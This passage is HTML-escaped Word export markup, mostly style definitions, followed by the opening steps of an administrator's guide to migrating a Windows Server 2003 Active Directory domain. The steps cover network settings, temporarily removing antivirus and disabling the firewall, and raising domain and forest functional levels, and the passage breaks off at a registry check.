List"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Revision"&gt;   &lt;w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"&gt;   &lt;w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"&gt;   &lt;w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"&gt;   &lt;w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"&gt;   &lt;w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"&gt;   &lt;w:lsdexception locked="false" priority="37" name="Bibliography"&gt;   &lt;w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;} @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 415 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-520092929 1073786111 9 0 415 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:0cm; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:36.0pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:0cm; 	margin-left:36.0pt; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:0cm; 	margin-left:36.0pt; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:36.0pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	font-size:10.0pt; 	mso-ansi-font-size:10.0pt; 	mso-bidi-font-size:10.0pt; 	mso-ascii-font-family:Calibri; 	mso-fareast-font-family:Calibri; 	mso-hansi-font-family:Calibri;} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 72.0pt 72.0pt 72.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:449592366; 	mso-list-type:hybrid; 	mso-list-template-ids:1337353004 -1754254970 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	margin-left:27.0pt; 	text-indent:-18.0pt;} @list l1 	{mso-list-id:1699623354; 	mso-list-type:hybrid; 	mso-list-template-ids:-1729584342 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l1:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	margin-left:18.0pt; 	text-indent:-18.0pt;} @list l1:level2 	{mso-level-number-format:alpha-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	margin-left:54.0pt; 	text-indent:-18.0pt;} @list l1:level3 	{mso-level-number-format:roman-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:right; 	margin-left:90.0pt; 	text-indent:-9.0pt;} @list l1:level4 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	margin-left:126.0pt; 	text-indent:-18.0pt;} ol 	{margin-bottom:0cm;} ul 	{margin-bottom:0cm;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Calibri","sans-serif"; 	mso-bidi-font-family:"Times New Roman";} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoListParagraphCxSpFirst" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;b style=""&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;1.&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;  &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Remove &lt;span style=""&gt; &lt;/span&gt;Antivirus from all “&lt;b style=""&gt;Server/ Servers” &lt;/b&gt;locations.&lt;b style=""&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;2.&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;  &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt; &lt;/span&gt;Assign new server IP Address:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;         &lt;/span&gt;IPAddress:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;         &lt;/span&gt;IP: &lt;span style=""&gt;                   &lt;/span&gt;x.x.x.x/nn&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;         &lt;/span&gt;Gateway: &lt;span style=""&gt;       &lt;/span&gt;x.x.x.x&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;         &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: 13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;DNS:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpLast" style="margin: 0cm 0cm 6pt 22.3pt; text-indent: -13.5pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;     &lt;/span&gt;&lt;span style=""&gt;     &lt;/span&gt;DNS : &lt;span style=""&gt;             &lt;/span&gt;x.x.x.x&lt;span style=""&gt; &lt;/span&gt; (Old server as Primary)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin: 0cm 0cm 6pt 22.3pt; text-indent: 13.5pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;DNS: &lt;span style=""&gt;              &lt;/span&gt;x.x.x.x &lt;span style=""&gt; &lt;/span&gt;(Self IP asSecondary)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpFirst" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;(**On New server make sure server &lt;span style="color:red;"&gt;windows firewall is disabled &lt;/span&gt;in order to ping it. OR put Exception to allow windows/ ICMP echo / Remote desktop/ DNS Traffic)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;3.&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;  &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt; &lt;/span&gt;Check all the location servers connectivity to each other : Using “Ping”&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpLast" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:14pt;"  &gt;&lt;span style="font-size:130%;"&gt;Phase1-Preparing Old Server 2003 domain environment &lt;/span&gt;&lt;span style=";font-size:130%;" &gt; &lt;/span&gt;&lt;span style="font-size:130%;"&gt;for Migration:&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;span style="font-size:130%;"&gt;a / Raise Domain Functional Level:-&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Go to&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Start &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;All Programs&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Administrative Tools&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Active directory domains and trusts &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Check domain functional level (r/c on domain name) &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;raise domain functional level to “windows server 2003” mode &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;(Note: requires Reboot then go to next step)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;span style="font-size:130%;"&gt;b/&lt;/span&gt;&lt;span style=";font-size:130%;" &gt; &lt;/span&gt;&lt;span style="font-size:130%;"&gt;Raise Forest Functional Level:-&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Go to&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Start &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;All Programs&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Administrative Tools&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Raise forest functional level (r/c on Active directory domains and trusts)&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Raise domain functional level to “Windows server 2003”mode.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;(Note: requires Reboot then go to next step)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraph" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;(**Restart all location servers, so that updates can be replicated to all servers and make sure domain and forest functional level on all the servers are updated.)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;span style="font-size:130%;"&gt;c/&lt;/span&gt;&lt;span style=";font-size:130%;" &gt; &lt;/span&gt;&lt;span style="font-size:130%;"&gt;Extend Active Directory Schema Version :-&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;To check current schema version&lt;span style=""&gt;  &lt;/span&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoListParagraph" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Start &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Run &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; regedit &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" 